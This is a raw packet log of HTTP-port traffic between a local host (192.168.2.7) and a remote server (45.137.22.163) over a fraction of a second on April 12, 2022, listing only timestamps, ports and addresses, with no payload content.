Apr 12, 2022 21:49:22.242023945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242089987 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242142916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242182970 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242254972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242316961 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242317915 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242377996 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242430925 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242434025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242494106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242549896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242559910 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242623091 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242676973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242677927 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242721081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242772102 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242774010 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242835999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242897034 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.242921114 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.242959976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243021965 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243040085 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243065119 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243132114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243197918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243204117 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243266106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243330956 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243344069 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243380070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243438005 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243443012 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243499994 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243558884 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243562937 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243619919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243678093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243686914 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243733883 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243793011 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243797064 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243854046 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243915081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.243917942 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.243980885 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244045019 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244044065 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244117022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244179010 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244179964 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244241953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244287014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244291067 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244349957 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244415045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244478941 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244479895 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244545937 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244611025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244612932 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244678974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244741917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244744062 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244810104 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244879007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244879007 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.244921923 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244965076 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.244972944 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245008945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245049953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245059013 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245095968 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245137930 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245150089 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245177984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245218039 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245239973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245260000 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245304108 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245312929 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245345116 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245383024 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245395899 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245413065 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245439053 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245460033 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245466948 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245496988 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245521069 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245526075 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245556116 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245573997 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245587111 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245623112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245640039 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245662928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245703936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245714903 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245742083 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245780945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245812893 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245824099 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245835066 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245867014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245908022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245920897 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.245948076 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.245990992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246001005 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.246023893 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246061087 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246072054 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.246107101 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246148109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246156931 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.246213913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.246279001 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.246326923 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.254499912 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269218922 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269265890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269290924 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269306898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269316912 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269344091 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269346952 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269371033 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269376993 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269397974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269409895 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269423962 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269431114 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269452095 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269453049 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269479036 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269479036 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269503117 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269506931 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269531012 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269532919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269561052 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269562006 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269586086 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269591093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269613028 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269618034 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269637108 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269645929 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269666910 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269671917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269699097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269711971 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269725084 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269733906 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269751072 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269757032 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269777060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269778013 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269802094 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269802094 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269819975 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269829035 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269845963 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269855022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269870996 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269884109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269896984 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269912958 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269927979 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269937992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269954920 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269963026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.269979000 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.269987106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270004988 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270009995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270030022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270035028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270047903 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270060062 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270076990 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270087004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270101070 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270112991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270126104 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270139933 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270154953 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270190001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270201921 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270216942 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270239115 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270240068 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270263910 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270268917 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270287991 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270291090 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270308018 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270318031 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270333052 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270344019 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270358086 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270381927 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270385981 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270407915 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270432949 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270432949 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270450115 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270461082 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270476103 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270487070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270508051 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270512104 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270526886 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270531893 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270555973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270556927 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270581961 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270601034 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270605087 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270623922 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270632982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270646095 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270658970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270673037 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270684004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270699978 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270709991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270725965 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270735979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270752907 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270765066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270776987 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270791054 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270808935 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270817995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270833015 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270843029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270858049 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270869970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270893097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270904064 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270910025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270922899 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270934105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270946026 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270958900 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270973921 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.270989895 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.270998955 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271004915 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271018982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271035910 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271043062 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271065950 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271068096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271095991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271101952 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271121979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271133900 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271150112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271176100 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271177053 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271203041 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271203041 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271223068 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271229029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271244049 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271255970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271272898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271281004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271297932 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271306992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271323919 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271332979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271348953 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271359921 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271373987 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271385908 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271400928 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271411896 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271428108 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271450996 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271476984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271480083 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271502018 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271506071 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271521091 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271528006 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271549940 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271553993 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271576881 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271580935 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271608114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271615982 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271636009 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271636009 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271668911 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271673918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271687984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271691084 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271699905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271727085 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271735907 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271754980 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271770954 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271787882 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271800041 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271812916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271821022 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271837950 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271845102 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271864891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271866083 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271892071 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271892071 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271917105 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271924973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271943092 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271951914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.271976948 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.271977901 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272003889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272011042 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272030115 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272032976 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272053957 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272054911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.272078037 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.272083998 CEST	80	49780	45.137.22.163	192.168.2.7
